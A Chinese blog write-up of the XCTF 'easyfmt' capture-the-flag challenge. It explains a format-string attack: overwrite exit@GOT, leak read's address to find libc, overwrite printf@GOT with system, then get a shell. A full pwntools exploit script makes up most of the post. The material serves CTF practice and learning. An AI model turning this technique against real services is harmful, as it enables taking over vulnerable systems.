XCTF-easyfmt-WP

chuj

2020 年 12 月 29 日

220次浏览

暂无评论

4755字数

CTF-WP

<p>easy是easy，但是特别麻烦。</p>

<p>简单的四步。</p>

<p>checkin没什么好办法，老老实实爆破，概率0.2，'0'-'4'都有可能</p>

<p>修改exit的got表值为</p>

<p>光标所指的这一行的地址，由于延迟绑定，原got表值为exit的plt表的偏移处，所以我们修改低二字节就可以了</p>

<p>leak出某个函数的got表值，用libcsearcher找出机器的libc版本</p>

<p>覆写printf@got为system的地址，输入'/bin/sh\x00'，getshell</p>

<pre class="wp-block-code"><code>#!/usr/bin/env python                                                                                 
# coding=utf-8                                                                                        
from pwn import *                                                                                     
from LibcSearcher import *                                                                            
context(log_level = 'debug')                                                                          
                                                                                                      
elf = ELF("./easyfmt")                                                                                
sh = remote('220.249.52.134','31322')                                                                 
sh.sendlineafter("enter:",'0')                                                                        
#payload = p64(elf.got["exit"]) + '%' + str(0x0982 - 8) + 'c' + '%8$hn'                               
payload = '%' + str(0x0982) + 'c' + '%10$hn'                                                          
payload = payload.ljust(16,'f')                                                                       
payload += p64(elf.got['exit'])                                                                       
sh.sendafter("slogan: ",payload)                                                                      
                                                                                                      
payload = 'start-%11$s-endf' #length 16                                                               
payload += p64(elf.got['read'])                                                                       
sh.sendafter("slogan: ",payload)                                                                      
sh.recvuntil('start-')                                                                                
#read_addr = int(sh.recvuntil('-end',drop = True),base = 16)                                          
read_addr = u64(sh.recvuntil('-end',drop = True).ljust(8,'\x00'))                                     
                                                                                                      
payload = ''                                                                                          
libc = LibcSearcher('read',read_addr)                                                                 
system_addr = read_addr - libc.dump('read') + libc.dump('system')                                     
print hex(system_addr)                                                                                
if(((system_addr & 0x00000000ffff0000)>>16) > (system_addr & 0x000000000000ffff)):                    
    payload  = '%' + str((system_addr & 0x000000000000ffff)) + 'c' + '%14$hn'                         
    payload += '%' + str(((system_addr & 0x00000000ffff0000)>>16) - (system_addr & 0x000000000000ffff)) 
+ 'c' + '%15$hn'                                                                                      
    payload = payload.ljust(32,'f')                                                                   
    payload += p64(elf.got['printf']) + p64(elf.got['printf'] + 2)                                    
else:                                                                                                 
    payload  = '%' + str((system_addr & 0x00000000ffff0000)>>16) + 'c' + '%15$hn'                     
    payload += '%' + str((system_addr & 0x000000000000ffff) - ((system_addr & 0x00000000ffff0000)>>16)) 
+ 'c' + '%14$hn'                                                                                      
    payload = payload.ljust(32,'f')                                                                   
    payload += p64(elf.got['printf']) + p64(elf.got['printf'] + 2)                                    
sh.sendafter("slogan: ",payload)                                                                      
sh.sendafter("slogan: ",'/bin/sh\x00')                                                                
sh.interactive()                                                                                        </code></pre>

<p>要注意的是每一次重新printf格式化字符串的时候，都进行了一次call操作，所以rsp会每次增加8，所以参数要每次加一。</p>

<p>这道题目也算是复习一下格式化字符串（几天不做就不会了），对于没有开启full reload的题，其实基本上就是leak libc->覆写got->ret2libc，堆利用和格式化字符串就是这么个套路</p>

最后修改：2020 年 12 月 30 日 11 : 46 PM

如果觉得我的文章对你有用,那听听上面我喜欢的歌吧

XCTF-easyfmt-WP